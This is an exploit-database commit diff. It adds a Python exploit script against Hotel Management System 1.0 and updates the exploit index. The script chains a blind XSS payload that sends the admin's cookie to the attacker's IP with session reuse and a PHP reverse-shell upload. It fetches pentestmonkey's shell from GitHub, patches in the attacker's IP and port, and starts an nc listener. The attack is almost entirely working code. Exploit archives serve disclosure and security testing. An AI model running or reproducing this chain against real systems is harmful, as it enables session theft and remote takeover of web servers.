DB: 2021-08-04

1 changes to exploits/shellcodes

Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)

exploits/php/webapps/50173.py

@@ -0,0 +1,131 @@
+# Exploit Title: Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE) 
+# Date: 2021-08-01
+# Exploit Author: Merbin Russel
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204
+# Version: V1.0
+# Tested on: Linux + xampp 7.4.21
+
+'''
+What does This Script Do:
+	1. Send BXSS payload to site
+	2. Wait until admin fires it
+	3. Steal admin's session using BXSS script
+	4. Using Admin's session, upload php shell
+	5. Make a reverse TCP connection
+	
+Why does It need BXSS?
+	1. Site contains file upload feature only in admin's panel.
+	2. To upload a file we need to know credentials of admin or session
+	3. BXSS used to steal admin's session to upload php file
+
+'''
+
+import socketserver as SocketServer
+from http.server import BaseHTTPRequestHandler, HTTPServer
+import sys
+import requests
+from time import sleep
+import _thread as thread
+import os
+import multiprocessing
+
+try:
+	your_ip = sys.argv[1]
+	your_port = sys.argv[2]
+	site_url = sys.argv[3]
+except IndexError:
+	print("please run this script as below format \npython3 text.py <attacker_IP> <Attacker_Port> <site's url> ")
+	sys.exit()
+	
+site_url_xss= site_url + "enquiry.php"
+os.system('echo "$(tput setaf 6) Trying To inject BXSS Script on site...."')
+xss_script='cc@g.com <script>document.location="http://'+your_ip+':'+your_port+'/?c="+document.cookie;</script>'
+r = requests.post(site_url_xss, data={'fname':'name', 'email':xss_script,'mobileno':'2154124512','subject':'XSS', 'description':'Blind', 'submit1':' '})
+global session
+session = ""
+os.system('echo "$(tput setaf 6) BXSS Script has been successfully injected on site...."')
+os.system('echo "$(tput setaf 6) Waiting for the BXSS payload to be fired..."')
+def exploit_trigger():
+	url_payload = site_url+"admin/pacakgeimages/payload.php"
+	r= requests.get(url_payload, allow_redirects=True)
+
+def listener():
+	os_command= "nc -lvp" + str(int(your_port)+1) +"-n"
+	os.system(os_command)
+
+def exploit():
+	    p1 = multiprocessing.Process(name='p1', target=listener)
+	    p2 = multiprocessing.Process(name='p2', target=exploit_trigger)
+	    p1.start()
+	    sleep(5)
+	    p2.start()
+
+def upolad_file():
+	os.system('echo "$(tput setaf 6) Trying To upload PHP reverse shell...$(tput sgr0)"')
+	global session
+	url = site_url+"admin/create-package.php"
+	cookies = {str(session.split("=",1)[0]): str(session.split("=",1)[1] )}
+	files = {'packagename': (None, 'Helloabcd123'),
+		'packagetype': (None, 'Helloabcddfff'),
+		'packagelocation': (None, 'locationing'),
+		'packageprice': (None, '12345'),
+		'packagefeatures': (None, 'python_free'),
+		'packagedetails': (None, 'hello_excuse_me'),
+		'packageimage': open('payload.php', 'rb'),
+		'submit': (None, ' '),}
+	r = requests.post(url, files=files, cookies=cookies, verify=False)
+	exploit()
+	
+
+
+def download_payload():
+	os.system('echo "$(tput setaf 6) BXSS script has been fired..."')
+	os.system('echo "$(tput setaf 6) Downloading  PHP reverse shell..."')
+	try:
+		url_payload= "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"
+		r = requests.get(url_payload, allow_redirects=True)
+	except: 
+		url_payload= "https://raw.githubusercontent.com/e23e/Testing/master/php-reverse-shell.php"
+		r = requests.get(url_payload, allow_redirects=True)
+	open('payload_temp.php', 'wb').write(r.content)
+	reading_file = open("payload_temp.php", "r")
+	new_file_content = ""
+	for line in reading_file:
+		stripped_line = line.strip()
+		new_line = stripped_line.replace("$ip = '127.0.0.1';  // CHANGE THIS", "$ip = '"+your_ip+"'; // Changed")
+		if stripped_line == "$port = 1234;       // CHANGE THIS":
+			new_line = stripped_line.replace("$port = 1234;       // CHANGE THIS", "$port = '"+str(int(your_port)+1)+"'; // Changed")
+		new_file_content += new_line +"\n"
+	reading_file.close()
+	writing_file = open("payload.php", "w")
+	writing_file.write(new_file_content)
+	writing_file.close()
+	upolad_file()
+def kill_me_please(server):
+                server.shutdown()
+            
+
+def grep_session(path_info):
+	global session
+	session= path_info.split("/?c=",1)[1] 
+	download_payload()
+	
+class MyHandler(BaseHTTPRequestHandler):
+
+    global httpd
+    global x
+    x=0
+    def do_GET(self):
+    	global httpd
+    	global x
+    	if x>=1:
+    		return
+    	x=x+1
+    	grep_session(self.path)
+    	self.send_response(200)
+    	thread.start_new_thread(kill_me_please, (httpd,))
+	
+
+httpd = SocketServer.TCPServer(("", 5555), MyHandler)
+httpd.serve_forever()

files_exploits.csv

@@ -44303,3 +44303,4 @@ id,file,description,date,author,type,platform,port
 50169,exploits/php/webapps/50169.txt,"Men Salon Management System 1.0 - SQL Injection Authentication Bypass",2021-08-02,"Akshay Khanna",webapps,php,
 50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",2021-08-02,"Mohammad Koochaki",webapps,php,
 50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF",2021-08-02,LiquidWorm,webapps,hardware,
+50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",2021-08-03,"Merbin Russel",webapps,php,